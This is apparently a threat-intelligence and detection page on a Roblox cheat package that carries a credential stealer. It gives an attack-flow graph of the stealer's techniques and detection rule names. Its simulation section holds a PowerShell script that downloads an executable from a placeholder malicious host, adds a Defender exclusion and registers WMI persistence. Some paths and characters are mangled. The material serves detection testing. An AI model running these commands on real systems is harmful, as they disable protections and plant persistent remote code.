Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A malicious Roblox cheat package combines a trojanized .NET interface with a Python stealer bundled through PyInstaller. The initial loader weakens Microsoft Defender protections, retrieves a second-stage payload from MediaFire, and launches malware derived from Glove Stealer to collect credentials, cookies, wallet files, and gaming-related assets. Stolen data is then exfiltrated through encrypted Discord webhooks and supported by a persistent Discord bot RAT.
Investigation
The report provides an in-depth static analysis of the malware, including extraction of the PyInstaller payload, decompilation of Python 3.12 bytecode, and mapping of the credential-theft workflow. It also outlines the full multi-stage execution chain, the defense-evasion methods used by the operators, and the five-layer bypass approach targeting Chrome App-Bound Encryption protections.
Mitigation
Organizations should block execution of unknown unsigned binaries, apply strict application allow-listing, monitor for changes to Defender exclusions and suspicious PowerShell usage, and detect unusual downloads of configuration data from Pastebin. Discord webhook traffic should be restricted or closely monitored, and defenders should watch for abnormal Chrome launches that use debugger-related flags.
Response
Security teams should alert on creation of winupdate.exe in the AppData cache, suspicious registry Run key modifications, scheduled task creation, and unusual Discord channel activity. Malicious files should be quarantined, unauthorized Defender exclusions removed, and forensic collection performed on any credential stores that may have been harvested.
"graph TB %% Class definitions classDef action fill:#99ccff classDef technique fill:#ffdd99 classDef tool fill:#cccccc classDef process fill:#bbffbb classDef persistence fill:#ff99cc %% Node definitions action_user_execution["<b>Action</b> – <b>T1204.002 User Execution</b><br/>Victim runs trojanized WPF executor disguised as a Roblox cheat tool."] class action_user_execution action technique_impair_defenses["<b>Technique</b> – <b>T1562.001 Impair Defenses: Disable or Modify Tools</b><br/>Adds current directory to Windows Defender exclusion list via PowerShell and patches AMSI/ETW functions."] class technique_impair_defenses technique tool_powershell["<b>Tool</b><br/>PowerShell script used to modify Defender exclusions and patch AMSI/ETW."] class tool_powershell tool technique_bypass_uac["<b>Technique</b> – <b>T1548.002 Abuse Elevation Control: Bypass UAC</b><br/>Hijacks HKCU\Software\Classes\ms-settings\Shell\Open\command and launches fodhelper.exe/computerdefaults.exe to obtain highu2011integrity execution."] class technique_bypass_uac technique tool_fodhelper["<b>Tool</b><br/>fodhelper.exe used for UAC bypass."] class tool_fodhelper tool technique_dead_drop["<b>Technique</b> – <b>T1102.001 Web Service: Dead Drop Resolver</b><br/>Retrieves XORu2011encrypted configuration from Pastebin URLs and resolves MediaFire download link."] class technique_dead_drop technique technique_ingress_tool["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b><br/>Downloads secondary PyInstalleru2011packed Python stealer (winupdate.exe) from MediaFire and stores it in %APPDATA%\.cache\winupdate.exe with hidden and system attributes."] class technique_ingress_tool technique process_secondary_payload["<b>Process</b><br/>winupdate.exe (Python stealer)"] class process_secondary_payload process technique_cred_browser["<b>Technique</b> – <b>T1555.003 Credentials from Web Browsers</b><br/>Multiu2011stage Chrome Appu2011Bound Encryption bypass (debugger breakpoint, COM elevation, double DPAPI, DLL injection, UAC registry hijack) to obtain decrypted cookies, tokens, and passwords."] class technique_cred_browser technique technique_keylogging["<b>Technique</b> – <b>T1056.001 Input Capture: Keylogging</b><br/>Installs a lowu2011level WH_KEYBOARD_LL hook to capture keystrokes."] class technique_keylogging technique technique_archive["<b>Technique</b> – <b>T1560.003 Archive via Custom Method</b><br/>Packages stolen files into an inu2011memory ZIP, chunked to u226425u202fMB fragments."] class technique_archive technique technique_exfiltration["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Sends ZIP chunks to a Discord webhook URL."] class technique_exfiltration technique tool_discord_webhook["<b>Tool</b><br/>Discord webhook used for data exfiltration."] class tool_discord_webhook tool technique_discord_rath["<b>Technique</b> – <b>Discord Bot RAT</b><br/>Uses decrypted Discord bot token and channel ID to receive remote commands (shell, webcam, trace, etc.)."] class technique_discord_rath technique technique_persistence["<b>Technique</b> – <b>T1547.001 Boot/Logon Autostart Execution</b><br/>Creates scheduled task, HKCU Run key, startup VBS script, COM hijack, PowerShell profile entry, and WMI Event Subscription to relaunch payload after reboot."] class technique_persistence persistence technique_dynamic_resolution["<b>Technique</b> – <b>T1568 Dynamic Resolution</b><br/>Periodically reu2011fetches configuration from Pastebin to adapt C2 endpoints."] class technique_dynamic_resolution technique %% Connections action_user_execution –>|triggers| technique_impair_defenses technique_impair_defenses –>|uses| tool_powershell technique_impair_defenses –>|enables| technique_bypass_uac technique_bypass_uac –>|uses| tool_fodhelper technique_bypass_uac –>|leads to| technique_dead_drop technique_dead_drop –>|retrieves| technique_ingress_tool technique_ingress_tool –>|stores and runs| process_secondary_payload process_secondary_payload –>|executes| technique_cred_browser process_secondary_payload –>|executes| technique_keylogging process_secondary_payload –>|collects data for| technique_archive technique_archive –>|prepares data for| technique_exfiltration technique_exfiltration –>|sends to| tool_discord_webhook tool_discord_webhook –>|feeds| technique_discord_rath technique_discord_rath –>|maintains command channel for| technique_persistence technique_persistence –>|establishes| persistence_mechanisms persistence_mechanisms["<b>Process</b><br/>Scheduled task / Run key / VBS / COM hijack / PowerShell profile / WMI event"] class persistence_mechanisms process technique_persistence –>|supports| technique_dynamic_resolution technique_dynamic_resolution –>|updates| technique_dead_drop "
Attack Flow
Detections
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
LOLBAS WScript / CScript (via process_creation)
View
Suspicious Defender Exclusions Modification (via cmdline)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Suspicious Pastebin Domain Communications Attempt (via proxy)
View
IOCs (HashSha256) to detect: AI-Powered Cheats & Stolen Secrets: Teardown of the Yuta/Solara Roblox Stealer
View
Detection of Active Memory Patching in Roblox Stealer [Windows Sysmon]
View
Detection of PowerShell Based Windows Defender Manipulation [Windows Powershell]
View
Roblox Injection and Windows Defender Tampering [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
- Ingress Tool Transfer (T1105): The attacker downloads the malicious Roblox executor (
SLaunch.exe) from a compromised web server. - Execution with Defender Tampering (T1548.002): Using PowerShell, the attacker runs
SLaunch.exewith a command line that invokesAdd-MpPreference -ExclusionPath "C:Roblox"to whitelist the Roblox installation folder, preventing Windows Defender from scanning the injected payload. - Persistence (T1546.003 / T1547.001): A WMI event subscription is created to relaunch
SLaunch.exeat system startup. - Credential Harvesting (T1056.001, T1555.003): While the injector is running, it captures keystrokes and extracts saved Roblox credentials from browser stores.
- Ingress Tool Transfer (T1105): The attacker downloads the malicious Roblox executor (
-
Regression Test Script: The following PowerShell script reproduces steps 2–3 and generates the telemetry the Sigma rule expects.
# ------------------------------------------------------------ # Roblox Injector Execution + Defender Exclusion (TC Script) # ------------------------------------------------------------ # Paths (adjust as needed) $injectorPath = "C:TempSLaunch.exe" $defenderExcl = "C:Roblox" # 1. Ensure the injector exists (download placeholder) if (-Not (Test-Path $injectorPath)) { Write-Host "Downloading malicious injector..." Invoke-WebRequest -Uri "http://malicious.example.com/SLaunch.exe" -OutFile $injectorPath } # 2. Execute injector with Defender exclusion command line $cmd = "-run -script `"UpdateSplash.EnsureWindowsDefenderExclusion()`" -Add-MpPreference -ExclusionPath `"$defenderExcl`"" Start-Process -FilePath $injectorPath -ArgumentList $cmd -NoNewWindow # 3. Create a WMI permanent event subscription for persistence $wmiFilter = @" SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'SLaunch.exe' "@ $filterPath = "ROOTDEFAULT" $filterName = "RobloxInjectorFilter" $consumerName = "RobloxInjectorConsumer" # Register filter $filter = Set-WmiInstance -Namespace $filterPath -Class __EventFilter ` -Arguments @{ Name=$filterName; Query=$wmiFilter; EventNamespace='rootcimv2'; QueryLanguage='WQL' } # Register command line consumer $consumer = Set-WmiInstance -Namespace $filterPath -Class CommandLineEventConsumer ` -Arguments @{ Name=$consumerName; CommandLineTemplate="`"$injectorPath`"" } # Bind filter to consumer Set-WmiInstance -Namespace $filterPath -Class __FilterToConsumerBinding ` -Arguments @{ Filter=$filter.__PATH; Consumer=$consumer.__PATH } Write-Host "Simulation complete – detection telemetry should have been generated." -
Cleanup Commands: Remove the Defender exclusion and the WMI subscription created above.
# Remove Defender exclusion Remove-MpPreference -ExclusionPath "C:Roblox" # Delete WMI filter & consumer $filterPath = "ROOTDEFAULT" Get-WmiObject -Namespace $filterPath -Class __EventFilter -Filter "Name='RobloxInjectorFilter'" | Remove-WmiObject Get-WmiObject -Namespace $filterPath -Class CommandLineEventConsumer -Filter "Name='RobloxInjectorConsumer'" | Remove-WmiObject Get-WmiObject -Namespace $filterPath -Class __FilterToConsumerBinding ` -Filter "Filter=`"__EventFilter.Name='RobloxInjectorFilter'`"" | Remove-WmiObject # Delete the injector binary Remove-Item -Path "C:TempSLaunch.exe" -Force